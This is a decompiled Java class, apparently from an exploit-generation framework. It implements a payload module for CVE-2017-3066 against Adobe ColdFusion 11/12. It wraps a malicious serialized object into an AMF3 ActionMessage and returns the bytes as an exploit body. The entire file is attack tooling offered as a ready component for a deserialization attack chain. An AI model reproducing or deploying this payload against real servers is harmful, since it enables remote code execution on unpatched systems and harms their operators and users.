package com.ar3h.chains.core.payload.impl;

import com.ar3h.chains.common.Payload;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.PayloadAnnotation;
import flex.messaging.io.SerializationContext;
import flex.messaging.io.amf.ActionMessage;
import flex.messaging.io.amf.AmfMessageSerializer;
import flex.messaging.io.amf.AmfTrace;
import flex.messaging.io.amf.MessageBody;
import java.io.ByteArrayOutputStream;

@PayloadAnnotation(name = "Adobe Coldfusion AMF3 Payload", description = "CVE-2017-3066 对恶意对象进行Java序列化 -> 封装 -> AmfMessage序列化, 最后生成返回字节流\nReference: https://github.com/codewhitesec/ColdFusionPwn", dependencies = {"Adobe Coldfusion 11/12"}, gadgetTags = {Tag.AmfDeserialize})
@Deprecated
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/core/payload/impl/AdobeColdfusionPayload.class */
public class AdobeColdfusionPayload implements Payload {
    @Override // com.ar3h.chains.common.Payload
    public Object marshal(Object obj) throws Exception {
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        SerializationContext serializationContext = new SerializationContext();
        AmfTrace amfTrace = new AmfTrace();
        AmfMessageSerializer amfMessageSerializer = new AmfMessageSerializer();
        amfMessageSerializer.initialize(serializationContext, byteArrayOutputStream, amfTrace);
        ActionMessage actionMessage = new ActionMessage(3);
        MessageBody messageBody = new MessageBody();
        messageBody.setData(obj);
        actionMessage.addBody(messageBody);
        amfMessageSerializer.writeMessage(actionMessage);
        return byteArrayOutputStream.toByteArray();
    }
}
